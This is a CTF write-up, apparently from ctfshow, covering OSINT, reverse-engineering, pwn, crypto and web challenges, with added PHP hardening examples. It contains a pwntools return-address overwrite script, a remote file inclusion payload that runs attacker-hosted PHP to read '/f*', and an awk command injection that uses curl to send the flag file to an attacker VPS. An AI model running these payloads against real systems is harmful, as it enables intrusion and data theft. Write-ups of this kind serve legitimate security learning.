OSINT
任性老板 (Capricious Boss)
A Yandex reverse image search turns up a Hupu thread about this spot: https://bbs.hupu.com/27645621.html
The comments there give the shop's name, 左撇子私房面 (Left-Hander's Private Noodles).
Searching that shop name on Baidu yields the phone number.
蛤壳雪茄-1 (Clamshell Cigar-1)
A Google reverse image search finds the original photo, which shows Mary River Aerodrome.
Searching for that name returns a list of results; searching the name of the first company in that list leads to the company's website, which contains the flag.
re
re sign-in (re签到)
Load the binary into IDA and press F5 to get the pseudocode. The decisive comparison is:

    if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabUZYTldaaFNFNTZZek5PZW1NelRucGpkejA5") )
    {
        printf(format, v10);
    }

The string looks like base64 (only alphanumerics, length a multiple of 4), and each decode produces another base64 string. Decoding three times gives the flag.
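As an added example (not part of the original write-up), the PHP function below peels nested base64 layers generically: it keeps decoding in strict mode until the output is no longer valid base64, which is exactly what happens once the plaintext is reached, and returns every layer so the encoding depth is visible. The function name peelBase64 and the variable $blob are chosen here; the input is the string compared by strcmp() above.

```php
<?php
// Added example, not code from the original write-up.
// Strip nested base64 layers until strict decoding fails. base64_decode() with
// $strict = true returns false on any character outside the base64 alphabet,
// so a plaintext containing '_' or '{' stops the loop on its own.
function peelBase64(string $data, int $maxRounds = 10): array {
    $layers = [$data];
    for ($i = 0; $i < $maxRounds; $i++) {
        $raw = base64_decode($data, true);            // strict: false on bad input
        if ($raw === false || $raw === '' || !ctype_print($raw)) {
            break;                                    // invalid or binary: stop here
        }
        $layers[] = $raw;
        $data = $raw;
    }
    return $layers;
}

// The string the decompiled binary compares against with strcmp()
$blob = 'V2toT2FWZ3pTbXhZTTA1d1dqSTFabUZYTldaaFNFNTZZek5PZW1NelRucGpkejA5';
foreach (peelBase64($blob) as $depth => $layer) {
    printf("layer %d: %s\n", $depth, $layer);
}
// The last layer printed is the plaintext the binary expects after three decodes.
```

The ctype_print() guard matters when you do not know the depth in advance: a layer that decodes to raw bytes is the signal that the previous layer was the real payload, not a further encoding.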
magic
Load it into IDA. From the pseudocode, write a C file that re-implements each check function and brute-forces the first value that passes all of them; that value is the flag.

    #include <stdio.h>
    #include <math.h>   /* link with -lm */

    /* Check 1: the decimal digit sum must be 58 */
    int checksum(int a) {
        int v3 = 0;
        while (a > 0) {
            v3 += a % 10;
            a /= 10;
        }
        return v3 == 58;
    }

    /* Check 2: trial division up to sqrt(a); returns 1 if a is prime
       (0 and 1 would also return 1, but checksum() already rejects them) */
    int p(int a) {
        int i;
        for (i = 2; sqrt(a) >= i; ++i) {
            if (!(a % i))
                return 0;
        }
        return 1;
    }

    /* Check 3: the number must be a decimal palindrome.
       v4 is the digit count; each round compares the leading digit (v5)
       with the trailing digit (v6), then strips both. */
    int h(int a) {
        int v2, v3, v4, v5, v6;
        v2 = a;
        v4 = 0;
        while (v2 > 0) {
            v2 /= 10;
            ++v4;
        }
        v3 = a;
        while (v3) {
            v5 = (int)(v3 / pow(10.0, v4 - 1));
            v6 = v3 % 10;
            v3 = (int)(v3 - pow(10.0, v4 - 1) * v5) / 10;
            if (v5 != v6)
                return 0;
            v4 -= 2;
        }
        return 1;
    }

    /* Brute force: the first integer passing all three checks is the flag value */
    int main() {
        int i = 0;
        while (1) {
            if (checksum(i) && p(i) && h(i)) {
                printf("%d\n", i);
                break;
            }
            i++;
        }
        return 0;
    }
pwn
pwn sign-in (pwn签到)
Address of shell_here: 0x80484f6
Offset calculation: 0xffffd43c - 0xffffd428 = 20 bytes
Script:

    from pwn import *

    # io = process("./pwn01")        # local test
    host = "pwn.challenge.ctf.show"
    port = 28030
    io = remote(host, port)
    io.recv()
    # 20 bytes of padding reach the saved return address; overwrite it with shell_here
    io.sendline(b"a" * 20 + p32(0x80484f6))
    io.interactive()
CRYPTO
The Dancing Men
This is the encoding described in this article:
https://blog.csdn.net/weixin_30278311/article/details/96365891
Each figure holding a flag marks the end of a word.
Translating the figures one by one gives the final result:
please use underslash between every word with initials in capitalm the flag is everyone loves taoshen
web
web sign-in (web签到)
The page turns out to be vulnerable to remote file inclusion.
Start an HTTP server with Python:

    python3 -m http.server 80

Payload:

    file=http://vps/1.php?id==di?php.1/spv//:ptth

The content of 1.php is the PHP code to execute:

    <?php
    echo system("cat /f*");
    ?>

This returns the flag.
easyPHP
    <?php
    # -*- coding: utf-8 -*-
    # @Author: h1xa
    # @Date: 2022-03-19 12:10:55
    # @Last Modified by: h1xa
    # @Last Modified time: 2022-03-19 13:27:18
    # @email: h1xa@ctfer.com
    # @link: https://ctfer.com
    error_reporting(0);
    highlight_file(__FILE__);
    $cmd = $_POST['cmd'];
    $param = $_POST['param'];
    if(isset($cmd) && isset($param)){
        $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
        shell_exec($cmd);
    }
GTFOBins shows that awk can execute commands:
https://gtfobins.github.io/gtfobins/awk/
I originally wanted a reverse shell, but for some reason it just wouldn't work.
Payload
awk executing a command:

    awk 'BEGIN {system("/bin/sh")}'

Payload:

    cmd=awk&param=BEGIN {system("curl http://vps:port/ -d`cat /f*`")}
$ nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 49.235.148.38 59270 received!
POST / HTTP/1.1
Host: 101.42.106.217:4444
User-Agent: curl/7.69.1
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
ctfshow{4cfa69be-43d3-4fc3-a474-be2e929f6e25}
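As an added example covering both web challenges above (this is not the challenges' own source), the PHP below shows hardened versions of the two sinks. For the web sign-in it assumes the page did something like include $_GET['file'] (the write-up does not show the source) and replaces the path with a lookup in a fixed map. For easyPHP it shows why escapeshellcmd()/escapeshellarg() were not enough: they only protect the shell's parsing step, while the first token of the command stays attacker-chosen, and awk accepts its whole program as one quoted argument. The fix picks the program server-side and runs it without a shell. The function names resolvePage and runTool, the $pages and $tools maps, and the pages/ and data/ directories are illustrative assumptions; the argv form of proc_open() needs PHP 7.4 or later.

```php
<?php
// Added example, not the challenges' own code: hardened versions of the two
// sinks seen above, keeping the same request parameter names.

// --- web sign-in: file inclusion -----------------------------------------------
// Assumed vulnerable pattern (not shown in the write-up):  include $_GET['file'];
// With allow_url_include=On that fetches and runs an attacker-hosted http:// file.
// Treat the request value as a key into a fixed map of local files instead, so
// neither a URL nor a ../ sequence ever reaches include().
function resolvePage(string $name, array $pages): ?string {
    return array_key_exists($name, $pages) ? $pages[$name] : null;
}

// --- easyPHP: command execution --------------------------------------------------
// The program is chosen server-side from an allowlist, and proc_open() gets an
// argv array, so no shell is involved and no quoting layer exists to escape from.
function runTool(string $tool, string $path, array $tools, string $dataDir): ?string {
    if (!array_key_exists($tool, $tools)) {
        return null;                                   // unknown tool: refuse
    }
    $real = realpath($path);                           // normalizes .. and symlinks
    if ($real === false || strpos($real, $dataDir . '/') !== 0) {
        return null;                                   // outside the data directory: refuse
    }
    $argv = array_merge($tools[$tool], [$real]);       // argv array => no shell
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Illustrative maps; the file names and the data/ directory are assumptions.
$pages = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];
$tools = [
    'wc'   => ['/usr/bin/wc', '-l'],
    'head' => ['/usr/bin/head', '-n', '5'],
];

$page = resolvePage($_GET['file'] ?? '', $pages);
if ($page !== null) {
    include $page;
}
if (isset($_POST['cmd'], $_POST['param'])) {
    $result = runTool($_POST['cmd'], $_POST['param'], $tools, __DIR__ . '/data');
    echo $result === null ? "rejected\n" : htmlspecialchars($result);
}
```

With this shape, a request carrying cmd=awk is rejected before anything runs, and even an allowlisted tool receives the user value only as a validated file path argument, never as program text.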